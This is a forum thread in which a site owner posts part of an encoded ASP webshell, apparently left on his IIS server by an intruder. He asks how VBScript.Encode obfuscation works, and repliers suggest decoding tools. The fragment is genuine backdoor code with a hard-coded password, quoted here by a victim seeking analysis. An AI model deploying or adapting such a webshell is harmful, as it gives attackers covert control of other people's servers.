我的网站被入侵了,黑客留下一个马,帮我看看

永夜星空 2009-01-24 02:30:33
我不知道是怎么入侵的,暂时也不想去管,但是他留了个asp在我的IIS里面.小弟学过VBS,可是不知道VBS还可以加密的,VBS加密的原理是什么,为什么加密了脚本还能运行.下面是这个木马的代码的一部分(太长了,贴不下来),我在自己的测试服务器上运行了下,叫做暗组WebShell,相当邪恶.
<%@ LANGUAGE = VBScript.Encode %>
<%
UserPass="3639"
#@~^rdMBAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O@#@&I/aWU/n ~EW0.P{Y.;@#@&6U,2.DK.,InkEs+Pg+XO@#@&?4+^VHCs+'r暗组超强功能版 +(?tssJ@#@&UkO+i]d'EtDOw=z&AShR9CM3dYc^K:&r@#@&ZWaXMro4YxJ暗组技术小组,Pl~,hhS NmD3kO mK:@!w&@*@!Om4s+,Ak9Y4xrJcXTrJ~4K.9+.{JrFJrP1nV^wCN9kUL{JJ8TJr@*@!D.@*@!DN@*@![k-~mVro xmxOnM@*Ael,空气[U4k2Lx8kwLx4kwLU4kw'x(/2' 4/a'x(/wGCO+= Z!0!+Z@!&Y9@*@!JY.@*@!zYC8^+@*J@#@&kE8,?4WhADMc#@#@&(0,2..,KtU@#@&PP,~]IUJ@!4.@*@!C,t.+6xBNl-CkmDr2D)4kkOKDzc4mm3v#E@*@!(D@*[ 4d2pJPL~2MDRGndmMqaYrWU~LPE@!JC@*@!4.@*r@#@&~~,P3DM ;VnmD=I+kwKU/RoV!/4@#@&PPAHN,qs@#@&3x9PUj$@#@&j!4~I"j`UY.b@#@&d]nkwGxknc]&YA`?DD*@#@&A19PUE8@#@&sE ^YbWx,.nnzK_`j#@#@&,P]2aCY4']3aSb^3v/SJ'EBJw'J*@#@&A19~s!x^YbWU@#@&sEg^Y&Wx,]]+al:tc?b@#@&P~I"3wmKuxM2ws)12c?BE'-EBJ'J#@#@&UN,0ix1KrG @#@&U4kUlx{E╁@*DY +^z@!@*mz@!回返@*Eb`0mC8cXDGOkk4)D2bD^kl7lLE'6nD4PC@!@*DnO +m@!@*D(@!@*M8@!╁'^I!3/b$╋b╁:C1w╁cKk+i}D'3\z1W╋#╁4Omn.N^Ws╁vYUnE$2]'4Y)2M2Nd6s╋k?ba]n/!'hDn\.nU╋V]jLb╁YkW4maYY4╁ck+s4m("l-M+jI2UR:j+!pnI{j.n7D+U╋b╁z╁vCKz22btR"2#D3j{Y6r" q╋#╁ ╁c_Kl2Kz: I-"+j{C:bw:WK]╋#╁ WrY1b╁cOU2j5nI{1W&P^b╋*╁IGf){J);rJ╁`k3V~b(.z.In#M2dRDjAE5D{wkM+7.+U╋#╁JI`╁`dn^4lb]b7D2j.3/cYU+;p3]{V.jr@#@&A6n/!K+cj4kjl o!xcUtb?l #*@#@&9khPUtrjmx~U4kUlxgnA/DDB?4kjC q@#@&w;x1YrG P?4rUlUs!Uv?4b?mxr(LkOD*@#@&?4kjC r4NdYMP',]nw^l1+c?4rUlUr(%/DDS~r╁J~~ErJE#@#@&wW.,?4k?mx&~',F~KKPJn `?4r?mxr(%dYM#@#@&~qW~tk[`U4kUlU6(L/O.BPjtbjmx(BP8#P@!@*,E╋J,K4+ @#@&j4k?mU1h?D.~',HbNc?4rUlUr(%/DDS~UtkjC qSP8b,[~Utb?l 1A?DD@#@&,2sd@#@&U4kUlxgnA?DD,'~\8/MSWPL~?4kjC
...全文
174 4 打赏 收藏 转发到动态 举报
写回复
用AI写文章
4 条回复
切换为时间正序
请发表友善的回复…
发表回复
hyjno9 2009-02-09
  • 打赏
  • 举报
回复
http://www.dheart.net/decode/index.php

VBScript.Encode 加密
岑子哥 2009-02-06
  • 打赏
  • 举报
回复
你用反编译软件看看。看能运行不。
biweilun 2009-02-04
  • 打赏
  • 举报
回复
其中肯定有解密的函数的,你可以去网上搜下网马解密的文章
永夜星空 2009-01-27
  • 打赏
  • 举报
回复
up up

4,008

社区成员

发帖
与我相关
我的任务
社区描述
它是一种微软环境下的轻量级的解释型语言,它使用COM组件、WMI、WSH、ADSI访问系统中的元素,对系统进行管理。
社区管理员
  • vbScript社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧